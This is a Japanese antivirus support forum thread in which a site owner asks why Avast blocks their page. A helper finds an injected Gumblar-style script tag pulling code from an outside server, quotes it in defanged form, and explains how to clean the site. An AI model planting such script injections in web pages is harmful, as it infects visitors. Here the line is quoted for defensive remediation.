Author Topic: firefoxでだけ検知される  (Read 5041 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
firefoxでだけ検知される
« on: May 11, 2016, 06:19:07 PM »
教えて下さい。

ある企画で、作成した壁紙ダウンロードページがあります。
私や友人が開いた限りでは、全く問題なくダウンロードが出来ました。

しかし、アバストを入れているPCで、firefoxで開こうとすると
マルウエア検知され、開けないと連絡がありました。
そこで、私もアバストおよびfirefoxをインストールして、試してみたところ
確かにブロックされて開けません。

ですが、オンラインチェックやほかのウイルスソフトでチェックしても、問題がありませんでした。
chromeで開く際も、アバストのチェックはOKと出て、表示されます。

アバストで出るメッセージは

ブロックした脅威
URL:(該当のページアドレス)
感染: JS:Includer-ZG [Trj]
プロセス:C:\Program Files (x86)\Mozilla Firefox\firefox.exe

となっています。


IEやchromeでは検知されないだけで、URLが不正になっているのでしょうか。
firefoxや、アバストの誤検知なのでしょうか。

本当に問題ないかどうか、その調べる方法、
また、問題ない場合、firefoxを利用している人にどう伝えればいいでしょうか。

サイトは友人に作成してもらったものを、引き継いで運営していますが、
html言語等、構築面は素人です。

すみませんが、宜しくお願い致します。




Offline NON

  • Japanese User
  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5494
  • Whatever will be, will be.
Re: firefoxでだけ検知される
« Reply #1 on: May 12, 2016, 12:53:56 PM »
こんばんは promessa さん


問題のページが分からないと何とも言えません。URLを教えてもらえますか?

Firefoxでだけ検知されるとのことですが、ページの埋め込み広告等でブラウザを判定している場合があり、Firefox向けの広告にだけ、何らかのマルウェアが紛れている可能性はあります。
Desktop: Win10 Pro 22H2 64bit / Core i5-7400 3.0GHz / 32GB RAM / Avast 23 Premium Beta(Icarus) / Comodo Firewall
Notebook: Win10 Pro 22H2 64bit / Core i5-3340M 2.7GHz / 12GB RAM / Avast 23 Free / Windows Firewall Control
Server: Win11 Pro 23H2 64bit / Core i3-4010U 1.7GHz / 12GB RAM / Avast One 23 Essential

Avast の設定について解説しています。よろしければご覧ください。

REDACTED

  • Guest
Re: firefoxでだけ検知される
« Reply #2 on: May 12, 2016, 03:23:29 PM »
NONさん、お返事ありがとうございます。

URLは、

http://www.paseri-densetsu.com/porepore/wallpaper.html

です。
このアドレスを配布したのですが、今のところ、アクセスエラーになったという報告はなく、
アバストを入れたPCを使っている身内が、firefoxで閲覧した際にエラーとなりました。

お手数おかけしますが、宜しくお願い致します。



REDACTED

  • Guest
Re: firefoxでだけ検知される
« Reply #3 on: May 12, 2016, 03:34:29 PM »
NONさんへ

お世話になっております。みじんこです。
私も該当URLにアクセスしてみましたら感染ブロックという形で出ましたのでご報告させていただきます。

URL: http://www.paseri-densetsu.com/porepore/wallpaper.html|{gzip}
感染: JS:Includer-ZG [Trj]
処理: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

おそらくどのブラウザで開いても、感染はブラウザ.exeなのでしょう。
参考になれば幸いです。

Offline NON

  • Japanese User
  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5494
  • Whatever will be, will be.
Re: firefoxでだけ検知される
« Reply #4 on: May 12, 2016, 04:15:42 PM »
ソースコードを調べたところ、5年以上前に流行ったGumblarウイルスのものと思われるスクリプトが紛れ込んでいるようです。
いつ作成されたウェブページでしょうか。

該当するのは、以下に示すソースコード中の2行目の"<script>"タグになります。
誤検知防止のため、意図的にコードを壊してあります。

Code: [Select]
</head>
<s cript src=http://rent.serverf26.com/highslide/letter.php ></script>
<body background="../porepore/images/bk.png"  text="#3366CC" link="#FF3399" vlink="#FF3399" alink="#666666" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages()">

参考
http://d.hatena.ne.jp/hiro-ueda/20100111/1263180526

ウェブサイトのスキャン結果 (9検知/56社)
https://www.virustotal.com/ja/file/93a418781f123105fbd5a700b0f800a15e544eabb4ab8edf4fb4b0dee0769760/analysis/1463061029/


既にウイルスの配布先サーバーは死んでいるので、現状であれば実害はないと思いますが、このスクリプトが入っているということは、
・過去(数年以上前)にウイルスに感染し、ウェブサイトを改竄された
・ウイルスに感染したウェブサイトのソースコードを、それと知らずに流用している
のどちらかかと思います。

Gumblarウイルスは、ウェブサイトのパスワードを盗み出してウェブサイトを改竄し、こういったスクリプトを埋め込む手法で爆発的に感染を拡大させた経緯があります。
もしウェブサイトのパスワードが当時のままであるならば、すぐに変更しておくことをお勧めします。

また、他にもページがあるのであれば、そちらにも同様のものがないか、確認することをお勧めします。
« Last Edit: May 12, 2016, 04:19:29 PM by NON »
Desktop: Win10 Pro 22H2 64bit / Core i5-7400 3.0GHz / 32GB RAM / Avast 23 Premium Beta(Icarus) / Comodo Firewall
Notebook: Win10 Pro 22H2 64bit / Core i5-3340M 2.7GHz / 12GB RAM / Avast 23 Free / Windows Firewall Control
Server: Win11 Pro 23H2 64bit / Core i3-4010U 1.7GHz / 12GB RAM / Avast One 23 Essential

Avast の設定について解説しています。よろしければご覧ください。

REDACTED

  • Guest
Re: firefoxでだけ検知される
« Reply #5 on: May 13, 2016, 12:31:18 AM »
NONさん

さっそくにお調べいただきまして、本当にありがとうございました!
教えていただいたscriptを削除したところ、firefooxでも開けました。

URLスキャン結果も、クリーンと出ました。

ただ、virustotalでは、URLの頭にwwwを付けるとクリーンになり
https://www.virustotal.com/ja/url/d67e6d0996217d927a14db43184f01265c37810f482dfc91c20121943513e7e1/analysis/1463091220/

付けないと2つ検知されてしまいます。
https://www.virustotal.com/ja/url/c6179c7b487c91bb64b7c47cd775c05d3cd6e47799deea679294bd1451a75a12/analysis/1463091138/

これは、どういうことなのか、お分かりになりますでしょうか。
ほかのスキャンサイトでは、両方クリーンと出ましたので、大丈夫なのでしょうか。
ネットでの閲覧も、どちらでも問題なく、
firefoxでも、どちらのURLでも開くことが出来ました。


>・過去(数年以上前)にウイルスに感染し、ウェブサイトを改竄された
>・ウイルスに感染したウェブサイトのソースコードを、それと知らずに流用している
>のどちらかかと思います。

これは、どちらも当てはまるように思われますので、ほかのページも早速チェックしてみます!
また、パスワードも変更したいと思います。


Offline NON

  • Japanese User
  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5494
  • Whatever will be, will be.
Re: firefoxでだけ検知される
« Reply #6 on: May 14, 2016, 12:35:19 PM »
URLスキャンについては、過去のデータベースを基に判断している場合が多いので、ラグがあるのでしょう。そのうち改善されるかと思います。

>・過去(数年以上前)にウイルスに感染し、ウェブサイトを改竄された
>・ウイルスに感染したウェブサイトのソースコードを、それと知らずに流用している
>のどちらかかと思います。

これは、どちらも当てはまるように思われますので、ほかのページも早速チェックしてみます!
また、パスワードも変更したいと思います。
感染したPCからパスワードを変えても、意味がない場合がありますので、そこはご注意ください。
Desktop: Win10 Pro 22H2 64bit / Core i5-7400 3.0GHz / 32GB RAM / Avast 23 Premium Beta(Icarus) / Comodo Firewall
Notebook: Win10 Pro 22H2 64bit / Core i5-3340M 2.7GHz / 12GB RAM / Avast 23 Free / Windows Firewall Control
Server: Win11 Pro 23H2 64bit / Core i3-4010U 1.7GHz / 12GB RAM / Avast One 23 Essential

Avast の設定について解説しています。よろしければご覧ください。

REDACTED

  • Guest
Re: firefoxでだけ検知される
« Reply #7 on: May 14, 2016, 07:00:24 PM »
NONさん

そうなんですね。分かりました。
いろいろとありがとうございました。助かりました。
パスワード設定については、別のPCから設定するようにしたいと思います。

また困ったことが起こったら、お邪魔させていただきます。

みじんこさんも、ありがとうございました。


Offline NON

  • Japanese User
  • Avast Überevangelist
  • Ultra Poster
  • *****
  • Posts: 5494
  • Whatever will be, will be.
Re: firefoxでだけ検知される
« Reply #8 on: May 16, 2016, 01:17:02 PM »
また何かありましたらお越しください :)
Desktop: Win10 Pro 22H2 64bit / Core i5-7400 3.0GHz / 32GB RAM / Avast 23 Premium Beta(Icarus) / Comodo Firewall
Notebook: Win10 Pro 22H2 64bit / Core i5-3340M 2.7GHz / 12GB RAM / Avast 23 Free / Windows Firewall Control
Server: Win11 Pro 23H2 64bit / Core i3-4010U 1.7GHz / 12GB RAM / Avast One 23 Essential

Avast の設定について解説しています。よろしければご覧ください。